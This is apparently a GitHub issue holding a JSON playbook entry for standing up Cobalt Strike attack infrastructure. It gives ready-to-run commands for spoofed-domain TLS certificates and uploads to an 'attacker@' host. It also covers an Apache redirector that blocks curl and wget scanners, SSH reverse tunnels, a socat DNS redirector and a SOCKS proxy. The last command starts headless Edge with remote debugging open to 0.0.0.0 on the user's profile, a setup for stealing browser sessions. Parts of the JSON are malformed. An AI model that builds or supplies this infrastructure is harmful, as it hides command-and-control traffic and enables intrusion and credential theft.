Open Patrick-DE opened 5 months ago
{ "name": "Cobalt Strike", "phases": [ "00. Infrastructure" ], "category": "", "stealthy": false, "platforms": [ "Windows", "Linux" ], "source": "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm", "description": "Cobalt Strike is a platform for adversary simulations and red team operations. The product is designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors.", "undetected": [], "detected": [], "commands": [ { "id": "1911bd14-d626-4e98-9938-15398478f49f", "name": "Add certificate to server", "description": "", "tag": "", "results": [], "cmd": "#Generating a RSA private key\nopenssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'\n#combine the separate public and private files into a single PFX file\nopenssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx\n#PFX file to a Java KeyStore\nkeytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store\n#upload to CS directory\nscp localhost.store attacker@10.10.10.10:/home/attacker/cobaltstrike/\n#add to the malleable profile\nhttps-certificate {\n set keystore \"localhost.store\";\n set password \"passsword\";\n}" }, { "id": "f6feb24b-9f33-4ff8-8332-41c624e63bb1", "name": "Setup redirector", "description": "", "tag": "", "results": [], "cmd": "sudo apt install apache2\nsudo a2enmod ssl rewrite proxy proxy_http\nsudo cd /etc/apache2/sites-enabled\nsudo rm 000-default.conf\nsudo ln -s ../sites-available/default-ssl.conf .\nsudo systemctl restart apache2" }, { "id": "cb900e82-c79e-4b35-b015-a222a5e1a159", "name": "Generate SSL certificate", "description": "", "tag": "", "results": [], "cmd": "openssl genrsa -out ecorp.key 2048\nopenssl req -new -key ecorp.key -out ecorp.csr\n#identify the path to your CA in this example /home/attacker/ca/\n#create ecorp.ext\nauthorityKeyIdentifier=keyid,issuer\nbasicConstraints=CA:FALSE\nkeyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = ecorp.com\nDNS.2 = www.ecorp.com\n#generate cert\nopenssl x509 -req -in ecorp.csr -CA ca/ca.crt -CAkey ca/ca.key -CAcreateserial -out ecorp.crt -days 365 -sha256 -extfile ca/ecorp.ext\n#view cert\nopenssl x509 -noout -text -in ecorp.crt\n#upload cert\nscp ecorp.key attacker@10.10.0.100:/home/attacker/private.key\nscp ecorp.crt attacker@10.10.0.100:/home/attacker/public.crt\nsudo cp private.key /etc/ssl/private/\nsudo cp public.crt /etc/ssl/certs/\n#change apache2 config\nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n+SSLCertificateKeyFile /etc/ssl/private/private.key\n+SSLCertificateFile /etc/ssl/private/public.crt\nsudo systemctl restart apache2" }, { "id": "5188e899-ecc7-40ff-adf7-22c481818012", "name": "Connect redirector with teamserver", "description": "-N no shell.\n-R is remote-port:host:host-port. Bind port 8443 on the redirector and any traffic via that port will be redirected to 127.0.0.1:443 on the team server.", "tag": "", "results": [], "cmd": "#reverse proxy\nssh -N -R 8443:localhost:443 redirector@10.10.10.10\n#add certificate to redirector\nscp localhost.crt redirector@10.10.10.10:/home/attacker/\nsudo cp localhost.crt /usr/local/share/ca-certificates/\nsudo update-ca-certificates\n#add apache2 config \nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n--\n<Directory /var/www/html/>\n Options Indexes FollowSymLinks MultiViews\n AllowOverride All\n Require all granted\n</Directory>\nSSLProxyEngine on\n--\n#add 404 page\necho \"404\" | sudo tee /var/www/html/404\n#add redirect with user_agent (curl or wget => block) + cookie (requires SESSIONID) check\nsudo nano /var/www/html/.htaccess\n--\nRewriteEngine on\n\nRewriteCond %{HTTP_USER_AGENT} curl|wget [NC]\nRewriteRule ^a$ 404 [PT]\n\nRewriteCond /var/www/html/%{REQUEST_URI} -f\nRewriteRule ^.*$ %{REQUEST_FILENAME} [L]\n\nRewriteCond %{HTTP_COOKIE} SESSIONID\nRewriteRule ^.*$ https://localhost:8443%{REQUEST_URI} [P]\n--" }, { "id": "9c6d8fec-47c0-4c90-81c7-80dd680ae17a", "name": "DNS redirector", "description": "SSH into redirector-2 and set up a port forward between ports 5353 on both the redirector and team server", "tag": "", "results": [], "cmd": "Name\tType\tData\nns1\t A\t 10.10.0.200\ndns\t NS\t ns1.ecorp.com.\n\nssh attacker@10.10.0.200 -R 5353:localhost:5353\n#use socat to listen on UDP 53 on redirector-2 and forward the traffic to TCP 5353\nsudo socat udp4-listen:53,reuseaddr,fork tcp:localhost:5353\n#use socat to listen on TCP 5353 and forward the traffic to UDP 53\nsudo socat tcp-listen:5353,reuseaddr,fork udp4-sendto:localhost:53" }, { "id": "78f5ce18-ca91-4c7c-ad1a-1785ca974333", "name": "Setup SOCKS", "description": "", "tag": "", "results": [ "PROTO:SOCKS" ], "cmd": "socks 9999 socks5" }, { "id": "7445ce18-ca91-4c7c-ad1a-1785ca974333", "name": "Spawn Google Chrome in debug mode", "description": "", "tag": "", "requirements:{ "tag": "TOOL:CHROMIUM" }, "results": [ "EXECUTION:REMOTE" ], "cmd": "execute 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe' --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0 --user-data-dir=%appdata%\Microsoft\Edge --headless --ignore-certificate-errors about:blank" } ], "content": "", "references": [] }